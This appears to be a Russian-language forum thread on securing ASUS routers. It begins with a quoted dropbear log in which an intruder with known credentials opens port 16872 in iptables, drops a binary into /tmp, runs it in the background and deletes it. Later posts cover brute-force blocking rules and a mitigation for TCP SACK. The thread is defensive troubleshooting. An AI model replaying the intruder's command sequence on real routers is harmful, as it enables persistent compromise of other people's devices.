Mar 6 07:05:14 dropbear[29940]: User Born executing 'cat /proc/version'
Mar 6 07:05:17 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -L -n'
Mar 6 07:05:22 dropbear[29940]: User Born executing 'ps'
Mar 6 07:05:26 dropbear[29940]: User Born executing 'cat /bin/cat 2>/dev/null'
Mar 6 07:07:19 dropbear[29940]: User Born executing 'cat > /tmp/bungee'
Mar 6 07:07:52 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -D INPUT -p tcp --dport 16872 -j ACCEPT; PATH=$PATH:/usr/sbin iptables -I INPUT -p tcp --dport 16872 -j ACCEPT'
Mar 6 07:08:02 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -t nat -D PREROUTING -p tcp --dport 16872 -j ACCEPT; PATH=$PATH:/usr/sbin iptables -t nat -I PREROUTING -p tcp --dport 16872 -j ACCEPT'
Mar 6 07:08:11 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -D DMZ -t nat -p tcp --dport 16872 -j RETURN; PATH=$PATH:/usr/sbin iptables -I DMZ -t nat -p tcp --dport 16872 -j RETURN'
Mar 6 07:08:24 dropbear[29940]: User Born executing 'chmod +x /tmp/bungee'
Mar 6 07:08:38 dropbear[29940]: User Born executing '( /tmp/bungee 16872 30 360 14400 0 10000 > /dev/null 2>&1 )&'
Mar 6 07:08:49 dropbear[29940]: User Born executing 'rm -f /tmp/bungee'
Mar 6 07:09:09 dropbear[29940]: Exit (Born): Exited normally
Mar 6 07:16:14 dropbear[30616]: Child connection from 149.255.202.108:51786
Mar 6 07:16:14 dropbear[30616]: Password auth succeeded for 'Born' from 149.255.202.108:51786
Mar 6 07:16:41 dropbear[30616]: Exit (Born): Exited normally

<< в логе авторизация не по ключу, а по паролю. Может, dropbear какой-древний?

Проблема в том что он логинится к веб-морде с вне (WAN) и меняет настройки SSH на свой порт 2222 и вход по паролю.
Доступ с WAN мне очень нужен так как, этот роутер стоит в маленьком офисе.

В логах нет попыток подбора пароля. Логинится он с первого раза. Зная Логин и Пароль.
Получается утечка логина и пароля только с внутри роутера.
Логин и пароль не сохранен в браузере, вход на него только с проверенного одного ноута.
Можно как то ограничить вход в Веб-морду через один МАК?

<< А tcpdump-ом (или другим анализатором) не проще трафик проанализировать, что бы просто узнать, как они к Вам попадают?

Попадает он на веб-морду роутера по логину и паролю, потом включает SSH, и коннектится по SSH. Вот старый лог с февраля:


Feb 20 00:09:14 HTTP(S) login: Login successful from 189.25.95.249
Feb 20 00:09:33 rc_service: httpd 1258:notify_rc restart_time;restart_httpd;restart_upnp
Feb 20 00:09:33 dropbear[1235]: Early exit: Terminated by signal
Feb 20 00:09:33 kernel: klogd: exiting
Feb 20 00:09:33 syslogd exiting
Feb 20 00:09:33 syslogd started: BusyBox v1.25.1
Feb 20 00:09:33 kernel: klogd started: BusyBox v1.25.1 (2017-01-25 00:07:39 WET)
Feb 20 00:09:33 dropbear[1903]: Running in background
Feb 20 00:09:34 start_nat_rules: apply the nat_rules(/tmp/nat_rules_vlan2_vlan2)!
Feb 20 00:09:34 RT-AC68U: start httpd
Feb 20 00:09:36 miniupnpd[1929]: HTTP listening on port 55981
Feb 20 00:09:36 miniupnpd[1929]: Listening for NAT-PMP/PCP traffic on port 5351
Feb 20 00:09:36 hour monitor: daemon is starting
Feb 20 00:09:36 hour monitor: daemon terminates
Feb 20 00:09:41 dropbear[1930]: Child connection from 189.25.95.249:45127


Hint! :D http://forum.ixbt.com/topic.cgi?id=14:62613:2149#2149

egorart
20-05-2017, 09:31
что-то я туплю
поставил защиту от брута (в веб-морде) 1200 секунд это получается 20 минут
вижу это в iptables-save

...
-A INPUT -p tcp -m tcp --dport 22022 --tcp-flags FIN,SYN,RST,ACK SYN -j BRUTE
...
-A BRUTE -m recent --update --seconds 1200 --hitcount 3 --name BRUTE --rsource -j DROP
-A BRUTE -m recent --set --name BRUTE --rsource -j ACCEPT
...

однако, судя по логам 10 мин.

20-05-2017 11:19:52 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:52 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:53 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:54 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:27:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:24 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:24 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:27:58 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:27:59 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:27:59 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:28:00 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:52 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:36:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339
20-05-2017 11:36:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339
20-05-2017 11:36:24 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339

в чем косяк?
прошивка последняя с asus.vectormm.net/rtn/
роутер asus rt-n16

и вот что-то туплю с блокировкой (
если я правильно понял, то надо так:

iptables -A INPUT -p tcp -s 220.225.230.7 --dport 22022 -j DROP
iptables -A INPUT -p tcp -s 46.128.44.23 --dport 22022 -j DROP
однако, в лока всё равно есть информация о попытках подключения

egorart
22-05-2017, 10:52
Кажется разобрался.
Если происходит просто долбежка с несуществующим именим (nonexistent), то ни чего не блокируется.
А если имя известно, то блокировка происходит.

22-05-2017 11:28:57 (warning|authpriv|dropbear) Bad password attempt for 'root' from 188.xxx.xx.10:14384
22-05-2017 11:29:02 (warning|authpriv|dropbear) Bad password attempt for 'root' from 188.xxx.xx.10:14384
22-05-2017 11:29:02 (info|authpriv|dropbear) Exit before auth (user 'root', 10 fails): Max auth tries reached - user 'root' from 188.xxx.xx.10:14384
Если добавлять правила, как я понял, в конец (iptables -A INPUT -p tcp -s 220.225.230.7 --dport 22022 -j DROP), то не блокируется.
А если в начало (iptables -I INPUT -s 220.225.230.7 -j DROP), то вроде как блокирует.
В логах теперь этих ip нет.

п.с. надеюсь такой вариант блокировки правильный
п.п.с. да, про fail2ban знаю. охото было так разобраться.

egorart
16-10-2017, 17:09
Уязвимости в Dnsmasq, позволяющие удалённо выполнить код атакующего (https://www.opennet.ru/opennews/art.shtml?num=47311)
Атака против WPA2, позволяющая перехватить трафик в WiFi-сети (https://www.opennet.ru/opennews/art.shtml?num=47392)
:(

Omega
12-03-2018, 15:50
https://forum.mikrotik.com/viewtopic.php?t=131748 :D

ff0255
06-08-2019, 22:48
Наши девайсы на прошивке энтузиастов вроде не попадают? (написано "Linux kernel version 2.6.29 or higher", а у нас 2.6.22)
https://www.theregister.co.uk/2019/06/17/linux_tcp_sack_kernel_crash/
https://access.redhat.com/security/vulnerabilities/tcpsack

На всякий случай добавил в post-firewall:

iptables -I SECURITY -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j logdrop
ip6tables -I SECURITY -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j logdrop